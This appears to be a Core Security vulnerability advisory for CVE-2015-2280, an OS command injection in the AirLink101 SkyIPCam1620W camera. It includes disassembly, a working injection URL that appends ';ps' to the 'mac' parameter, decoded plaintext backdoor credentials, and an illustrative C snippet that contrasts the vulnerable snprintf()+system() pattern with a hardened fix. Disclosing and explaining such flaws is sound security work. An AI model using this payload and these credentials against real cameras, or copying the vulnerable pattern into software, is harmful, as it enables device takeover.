**CVSS v2:** 9 High (AV:N/AC:L/Au:S/C:C/I:C/A:C)
- Attack Vector: NETWORK
- Attack Complexity: LOW
- Authentication: SINGLE
- Confidentiality Impact: COMPLETE
- Integrity Impact: COMPLETE
- Availability Impact: COMPLETE

**CVSS v3:** 8.8 High (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
- Attack Vector: NETWORK
- Attack Complexity: LOW
- Privileges Required: LOW
- User Interaction: NONE
- Scope: UNCHANGED
- Confidentiality Impact: HIGH
- Integrity Impact: HIGH
- Availability Impact: HIGH

**EPSS:** 0.916 High (Percentile: 98.9%)
**Title:** AirLink101 SkyIPCam1620W OS Command Injection
**Advisory ID:** CORE-2015-0011
**Advisory URL:** <https://www.coresecurity.com/advisories/airlink101-skyipcam1620w-os-command-injection>
**Date published:** 2015-07-08
**Date of last update:** 2015-07-08
**Vendors contacted:** AirLink101
**Release mode:** User release
**Class:** OS Command Injection [CWE-78], Use of Hard-coded Credentials [CWE-798]
**Impact:** Code execution
**Remotely Exploitable:** Yes
**Locally Exploitable:** No
**CVE Name:** CVE-2015-2280
The AirLink101 SkyIPCam1620W Wireless N MPEG4 3GPP Network Camera streams high-quality MPEG4 and MJPEG images. It supports remote surveillance from computers over the Internet or from mobile handheld devices.
The SkyIPCam1620W Wireless N MPEG4 3GPP Network Camera [1] is vulnerable to OS command injection in the snwrite.cgi binary.
Core Security recommends applying a WAF (Web Application Firewall) rule that filters the vulnerable request (either the CGI file itself or the parameter in which the injection is performed) in order to prevent exploitation.
Contact the vendor for further information.
This vulnerability was discovered and researched by Nahuel Riva from the Core Security Exploit Writing Team. The publication of this advisory was coordinated by Joaquin Rodriguez Varela from the Core Security Advisories Team.
[CVE-2015-2280] The snwrite.cgi binary has an OS Command Injection at function loc_8928 when handling the “mac” parameter:
```
.text:00008928
.text:00008928 loc_8928
.text:00008928                 BL      memset
.text:0000892C                 LDR     R3, [R7,#0x40]
.text:00008930                 LDR     R2, =stderr
.text:00008934                 ADD     R3, R5, R3
.text:00008938                 LDR     R0, [R2]        ; stream
.text:0000893C                 LDR     R1, =aMacS      ; "mac = %s"
.text:00008940                 LDR     R2, [R3,#0x104]
.text:00008944                 BL      fprintf
.text:00008948                 LDR     R2, [R7,#0x40]
.text:0000894C                 ADD     R2, R5, R2
.text:00008950                 LDR     R3, [R2,#0x104]
.text:00008954                 MOV     R1, #0x80       ; maxlen
.text:00008958                 LDR     R2, =aEtcInit_dMacwr ; "/etc/init.d/macwrite.sh %s 1>/dev/null "...
.text:0000895C                 MOV     R0, R8          ; s
.text:00008960                 BL      snprintf
.text:00008964                 MOV     R0, R8          ; command
.text:00008968                 BL      system
.text:0000896C                 LDR     R4, [R7,#0x40]
.text:00008970                 B       loc_8908
.text:00008970 ; End of function sub_88A8
.text:00008970
```
The “mac” parameter is passed unsanitized to a printf()-family call (snprintf() in the disassembly above) that builds a command line invoking the macwrite.sh shell script, which updates the MAC address configuration. The resulting string is then handed to system(). Because the shell parses that string, arbitrary commands can be injected simply by appending a “;” to the “mac” value, for example:
```
http://<Camera_IP>/maker/snwrite.cgi?mac=1234;ps
```
In order to invoke the snwrite.cgi binary valid credentials are required, but a backdoor account located in /server/usr.ini can be used:
```
nriva@fastix:/mnt/firmware/server$ cat usr.ini
admin=Basic YWRtaW46YWRtaW4=
maker=Basic cHJvZHVjdG1ha2VyOmZ0dnNiYW5uZWRjb2Rl
```
These credentials are stored as HTTP Basic authorization values, i.e. merely base64-encoded, so they are trivial to recover:
```
>>> "YWRtaW46YWRtaW4=".decode("base64")
'admin:admin'
>>> "cHJvZHVjdG1ha2VyOmZ0dnNiYW5uZWRjb2Rl".decode("base64")
'productmaker:ftvsbannedcode'
```
Using the ‘productmaker:ftvsbannedcode’ backdoor account allows access to the path /maker/snwrite.cgi and therefore the ability to perform the injection explained above.
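The following C example is added here to illustrate the bug class, and is not code from Core Security or from the camera firmware. It reproduces the vulnerable snprintf()+system() pattern seen in the disassembly beside a hardened variant that allow-lists the MAC format and passes the value to the script as an argv entry via execv(), so no shell ever parses it. The script path and the exact format string are assumptions (the real format string is truncated in the disassembly); the test uses /bin/true as a stand-in script.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* Vulnerable pattern: the untrusted "mac" value is formatted straight into a
 * shell command line, which the firmware then hands to system(). The format
 * string is an assumed, shortened version of the one in the disassembly. */
int build_macwrite_cmd(char *out, size_t outlen, const char *mac) {
    return snprintf(out, outlen, "/etc/init.d/macwrite.sh %s 1>/dev/null", mac);
}

/* Shows why system() is the problem: a ';' in "mac" survives into the command
 * line, so the shell would run whatever follows it as a second command. */
int built_cmd_contains_semicolon(const char *mac) {
    char cmd[128];
    build_macwrite_cmd(cmd, sizeof cmd, mac);
    return strchr(cmd, ';') != NULL;
}

/* Strict allow-list: exactly six hex byte pairs separated by ':' (17 chars). */
int valid_mac(const char *mac) {
    if (strlen(mac) != 17) return 0;
    for (int i = 0; i < 17; i++) {
        if (i % 3 == 2) { if (mac[i] != ':') return 0; }
        else if (!isxdigit((unsigned char)mac[i])) return 0;
    }
    return 1;
}

/* Hardened replacement: validate first, then exec the script directly with an
 * argument vector. Returns the child's exit status, or -1 if the input was
 * rejected or the process could not be started. */
int run_macwrite_safe(const char *script, const char *mac) {
    if (!valid_mac(mac)) return -1;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        char *const argv[] = {(char *)script, (char *)mac, NULL};
        execv(script, argv);   /* "mac" is argv[1], never shell-parsed */
        _exit(127);
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```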
[1] <http://airlink101.com/products/aic1620w.php>.
CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: CoreSecurity.com/core-labs.
Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations.
Core Security’s software solutions build on over a decade of trusted research and leading-edge threat expertise from the company’s Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: <https://www.coresecurity.com>.
The contents of this advisory are copyright © 2015 Core Security and © 2015 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: <http://creativecommons.org/licenses/by-nc-sa/3.0/us/>
This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at <https://www.coresecurity.com/files/attachments/core_security_advisories.asc>.